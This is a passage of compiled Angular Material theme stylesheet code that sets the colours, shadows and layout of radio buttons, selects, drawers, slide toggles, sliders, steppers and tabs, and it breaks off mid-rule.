.mat-radio-persistent-ripple[_ngcontent-%COMP%], .mat-radio-button.mat-warn[_ngcontent-%COMP%]:active   .mat-radio-persistent-ripple[_ngcontent-%COMP%]{background-color:#f44336}.mat-radio-button.mat-radio-disabled.mat-radio-checked[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%], .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-outer-circle[_ngcontent-%COMP%]{border-color:#00000061}.mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-ripple[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-inner-circle[_ngcontent-%COMP%]{background-color:#00000061}.mat-radio-button.mat-radio-disabled[_ngcontent-%COMP%]   .mat-radio-label-content[_ngcontent-%COMP%]{color:#00000061}.mat-radio-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-select-value[_ngcontent-%COMP%]{color:#000000de}.mat-select-placeholder[_ngcontent-%COMP%]{color:#0000006b}.mat-select-disabled[_ngcontent-%COMP%]   .mat-select-value[_ngcontent-%COMP%]{color:#00000061}.mat-select-arrow[_ngcontent-%COMP%]{color:#0000008a}.mat-select-panel[_ngcontent-%COMP%]{background:white}.mat-select-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-select-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple){background:rgba(0,0,0,.12)}.mat-form-field.mat-focused.mat-primary[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#2196f3}.mat-form-field.mat-focused.mat-accent[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#7b1fa2}.mat-form-field.mat-focused.mat-warn[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%], .mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-invalid[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#f44336}.mat-form-field[_ngcontent-%COMP%]   .mat-select.mat-select-disabled[_ngcontent-%COMP%]   .mat-select-arrow[_ngcontent-%COMP%]{color:#00000061}.mat-drawer-container[_ngcontent-%COMP%]{background-color:#f5f5f5;color:#000000de}.mat-drawer[_ngcontent-%COMP%]{background-color:#fff;color:#000000de}.mat-drawer.mat-drawer-push[_ngcontent-%COMP%]{background-color:#fff}.mat-drawer[_ngcontent-%COMP%]:not(.mat-drawer-side){box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.mat-drawer-side[_ngcontent-%COMP%]{border-right:solid 1px rgba(0,0,0,.12)}.mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%], [dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side[_ngcontent-%COMP%]{border-left:solid 1px rgba(0,0,0,.12);border-right:none}[dir=rtl][_ngcontent-%COMP%]   .mat-drawer-side.mat-drawer-end[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px rgba(0,0,0,.12)}.mat-drawer-backdrop.mat-drawer-shown[_ngcontent-%COMP%]{background-color:#0009}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#7b1fa28a}.mat-slide-toggle.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#2196f38a}.mat-slide-toggle.mat-primary.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-thumb[_ngcontent-%COMP%]{background-color:#f44336}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#f443368a}.mat-slide-toggle.mat-warn.mat-checked[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#f44336}.mat-slide-toggle[_ngcontent-%COMP%]:not(.mat-checked)   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-slide-toggle-thumb[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f;background-color:#fafafa}.mat-slide-toggle-bar[_ngcontent-%COMP%]{background-color:#00000061}.mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#2196f3}.mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-primary[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#2196f333}.mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-accent[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#7b1fa233}.mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#f44336}.mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-thumb-label-text[_ngcontent-%COMP%]{color:#fff}.mat-slider.mat-warn[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#f4433633}.mat-slider[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%], .mat-slider.cdk-focused[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000061}.mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-background[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-track-fill[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-disabled[_ngcontent-%COMP%]:hover   .mat-slider-track-background[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]   .mat-slider-focus-ring[_ngcontent-%COMP%]{background-color:#0000001f}.mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#000000de}.mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value.mat-slider-thumb-label-showing.cdk-focused[_ngcontent-%COMP%]   .mat-slider-thumb-label[_ngcontent-%COMP%]{background-color:#00000042}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing)   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000042;background-color:transparent}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000061}.mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing):hover.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%], .mat-slider.mat-slider-min-value[_ngcontent-%COMP%]:not(.mat-slider-thumb-label-showing).cdk-focused.mat-slider-disabled   .mat-slider-thumb[_ngcontent-%COMP%]{border-color:#00000042}.mat-slider-has-ticks[_ngcontent-%COMP%]   .mat-slider-wrapper[_ngcontent-%COMP%]:after{border-color:#000000b3}.mat-slider-horizontal[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to right,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent);background-image:-moz-repeating-linear-gradient(.0001deg,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent)}.mat-slider-vertical[_ngcontent-%COMP%]   .mat-slider-ticks[_ngcontent-%COMP%]{background-image:repeating-linear-gradient(to bottom,rgba(0,0,0,.7),rgba(0,0,0,.7) 2px,transparent 0,transparent)}.mat-step-header.cdk-keyboard-focused[_ngcontent-%COMP%], .mat-step-header.cdk-program-focused[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]:hover:not([aria-disabled]), .mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=false]{background-color:#0000000a}.mat-step-header[_ngcontent-%COMP%]:hover[aria-disabled=true]{cursor:default}@media (hover: none){.mat-step-header[_ngcontent-%COMP%]:hover{background:none}}.mat-step-header[_ngcontent-%COMP%]   .mat-step-label[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]   .mat-step-optional[_ngcontent-%COMP%]{color:#0000008a}.mat-step-header[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{background-color:#0000008a;color:#fff}.mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header.mat-accent[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon[_ngcontent-%COMP%]{color:#fff}.mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-selected[_ngcontent-%COMP%], .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-done[_ngcontent-%COMP%], .mat-step-header.mat-warn[_ngcontent-%COMP%]   .mat-step-icon-state-edit[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.mat-step-header[_ngcontent-%COMP%]   .mat-step-icon-state-error[_ngcontent-%COMP%]{background-color:transparent;color:#f44336}.mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-active[_ngcontent-%COMP%]{color:#000000de}.mat-step-header[_ngcontent-%COMP%]   .mat-step-label.mat-step-label-error[_ngcontent-%COMP%]{color:#f44336}.mat-stepper-horizontal[_ngcontent-%COMP%], .mat-stepper-vertical[_ngcontent-%COMP%]{background-color:#fff}.mat-stepper-vertical-line[_ngcontent-%COMP%]:before{border-left-color:#0000001f}.mat-horizontal-stepper-header[_ngcontent-%COMP%]:before, .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .mat-stepper-horizontal-line[_ngcontent-%COMP%]{border-top-color:#0000001f}.mat-horizontal-stepper-header[_ngcontent-%COMP%]{height:72px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%], .mat-vertical-stepper-header[_ngcontent-%COMP%]{padding:24px}.mat-stepper-vertical-line[_ngcontent-%COMP%]:before{top:-16px;bottom:-16px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:after, .mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-horizontal-stepper-header[_ngcontent-%COMP%]:before{top:36px}.mat-stepper-label-position-bottom[_ngcontent-%COMP%]   .mat-stepper-horizontal-line[_ngcontent-%COMP%]{top:36px}.mat-sort-header-arrow[_ngcontent-%COMP%]{color:#757575}.mat-tab-nav-bar[_ngcontent-%COMP%], .mat-tab-header[_ngcontent-%COMP%]{border-bottom:1px solid rgba(0,0,0,.12)}.mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-nav-bar[_ngcontent-%COMP%], .mat-tab-group-inverted-header[_ngcontent-%COMP%]   .mat-tab-header[_ngcontent-%COMP%]{border-top:1px solid rgba(0,0,0,.12);border-bottom:none}.mat-tab-label[_ngcontent-%COMP%], .mat-tab-link[_ngcontent-%COMP%]{color:#000000de}.mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#00000061}.mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#000000de}.mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#00000061}.mat-tab-group[class*=mat-background-][_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar[class*=mat-background-][_ngcontent-%COMP%]{border-bottom:none;border-top:none}.mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.mat-tab-group.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#2196f3}.mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-primary.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.mat-tab-group.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-accent.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.mat-tab-group.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#f44336}.mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-group.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-warn.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ink-bar[_ngcontent-%COMP%]{background-color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#bbdefb4d}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#2196f3}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before, .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%]   .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-group.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-primary[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-group.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%]   .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#e1bee74d}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > 